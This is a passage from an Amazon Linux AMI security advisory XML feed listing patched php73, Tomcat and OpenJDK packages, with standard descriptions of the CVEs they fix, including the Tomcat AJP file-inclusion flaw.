arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.15" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.15-1.24.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.15-1.24.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.15" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.15-1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1352</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1352: important priority package update for tomcat7</title><issued date="2020-03-09 19:20:00" /><updated date="2021-08-20 19:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1938:
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
1806398: CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability
CVE-2020-1935:
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806835: CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling
CVE-2019-17569:
The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806849: CVE-2019-17569 tomcat: Regression in handling of Transfer-Encoding header allows for HTTP request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17569" title="" id="CVE-2019-17569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935" title="" id="CVE-2020-1935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938" title="" id="CVE-2020-1938" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-jsp-2.2-api" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.100-1.36.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.100" release="1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.100-1.36.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1353</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1353: important priority package update for tomcat8</title><issued date="2020-03-09 19:21:00" /><updated date="2021-08-20 19:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1938:
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
1806398: CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability
CVE-2020-1935:
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806835: CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling
CVE-2019-17569:
The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
1806849: CVE-2019-17569 tomcat: Regression in handling of Transfer-Encoding header allows for HTTP request smuggling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17569" title="" id="CVE-2019-17569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1935" title="" id="CVE-2020-1935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938" title="" id="CVE-2020-1938" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-javadoc" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.51-1.83.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.51" release="1.83.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.51-1.83.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1354</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1354: important priority package update for java-1.7.0-openjdk</title><issued date="2020-03-16 21:23:00" /><updated date="2020-03-18 22:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2659:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241 and 8u231; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791284: CVE-2020-2659 OpenJDK: Incomplete enforcement of maxDatagramSockets limit in DatagramChannelImpl (Networking, 8231795)
CVE-2020-2654:
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1791217: CVE-2020-2654 OpenJDK: Excessive memory usage in OID processing in X.509 certificate parsing (Libraries, 8234037)
CVE-2020-2604:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS v3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
99999:
1790944: CVE-2020-2604 OpenJDK: Serialization filter changes via jdk.serialFilter property modification (Serialization, 8231422)
CVE-2020-2601:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. While the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N).
99999:
1790570: CVE-2020-2601 OpenJDK: Use of unsafe RSA-MD5 checksum in Kerberos TGS (Security, 8229951)
CVE-2020-2593:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
99999:
1790884: CVE-2020-2593 OpenJDK: Incorrect isBuiltinStreamHandler check causing URL normalization issues (Networking, 8228548)
CVE-2020-2590:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
99999:
1790556: CVE-2020-2590 OpenJDK: Improper checks of SASL message properties in GssKrb5Base (Security, 8226352)
CVE-2020-2583:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
99999:
1790444: CVE-2020-2583 OpenJDK: Incorrect exception processing during deserialization in BeanContextSupport (Serialization, 8224909)
CVE-2019-2999:
Vulnerability in the Java SE product of Oracle Java SE (component: Javadoc). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).
No description is available for this CVE.
99999:
CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
1760992: CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
1760992:
CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
CVE-2019-2992:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
1761146: CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
1761146:
CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
CVE-2019-2989:
Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle GraalVM (component: Java). The supported version that is affected is 19.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. While the vulnerability is in Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle GraalVM Enterprise Edition accessible data. CVSS 3.0 Base Score 6.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. While the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS v3.0 Base Score 6.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
No description is available for this CVE.
99999:
CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
1761601: CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
1761601:
CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
CVE-2019-2988:
